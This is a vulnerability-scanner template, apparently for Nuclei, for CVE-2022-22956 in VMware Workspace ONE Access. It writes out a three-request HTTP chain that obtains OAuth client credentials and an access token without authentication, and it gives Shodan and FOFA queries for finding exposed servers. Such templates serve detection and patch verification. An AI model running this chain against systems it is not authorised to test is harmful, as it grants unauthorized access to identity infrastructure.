VMware Workspace ONE Access has two authentication bypass vulnerabilities (CVE-2022-22955 & CVE-2022-22956) in the OAuth2 ACS framework. A malicious actor may bypass the authentication mechanism and execute any operation due to exposed endpoints in the authentication framework.
PoC代码[已公开]
id: CVE-2022-22956
info:
name: VMware Workspace ONE Access - Authentication Bypass
author: daffainfo
severity: critical
description: |
VMware Workspace ONE Access has two authentication bypass vulnerabilities (CVE-2022-22955 & CVE-2022-22956) in the OAuth2 ACS framework. A malicious actor may bypass the authentication mechanism and execute any operation due to exposed endpoints in the authentication framework.
impact: |
Attackers can bypass authentication and perform unauthorized operations, potentially leading to full system compromise.
remediation: |
Apply the latest security patches provided by VMware to address these vulnerabilities.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain.rb
- https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-22956
- http://packetstormsecurity.com/files/171918/Mware-Workspace-ONE-Remote-Code-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-22956
cwe-id: CWE-287
epss-score: 0.79786
epss-percentile: 0.99043
cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: vmware
product: identity_manager
shodan-query: http.favicon.hash:"-1250474341"
fofa-query: icon_hash=-1250474341
tags: cve,cve2022,vmware,workspace,auth-bypass,vkev,vuln
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /SAAS/API/1.0/REST/oauth2/generateActivationToken/Service__OAuth2Client HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
matchers:
- type: dsl
dsl:
- 'contains_all(body, "activationToken", "_links")'
- 'contains(header, "application/json")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: json
name: activation_token
json:
- '.activationToken'
internal: true
- raw:
- |
POST /SAAS/API/1.0/REST/oauth2/activate HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{activation_token}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "client_id", "client_secret")'
- 'contains(header, "application/json")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: json
name: client_id
json:
- '.client_id'
internal: true
- type: json
name: client_secret
json:
- '.client_secret'
internal: true
- raw:
- |
POST /SAAS/auth/oauthtoken HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
grant_type=client_credentials&client_id={{client_id}}&client_secret={{client_secret}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "access_token", "token_type")'
- 'contains(header, "application/json")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502204c8a095c3d703ca0fa5a34c3a50900db70f31124c19a3e99430012d511a74385022100de789ce9c268f81910f6dbe8c116acb4b0128a8eca0dd7a642a069d6e7658646:922c64590222798bb761d5b6d8e72950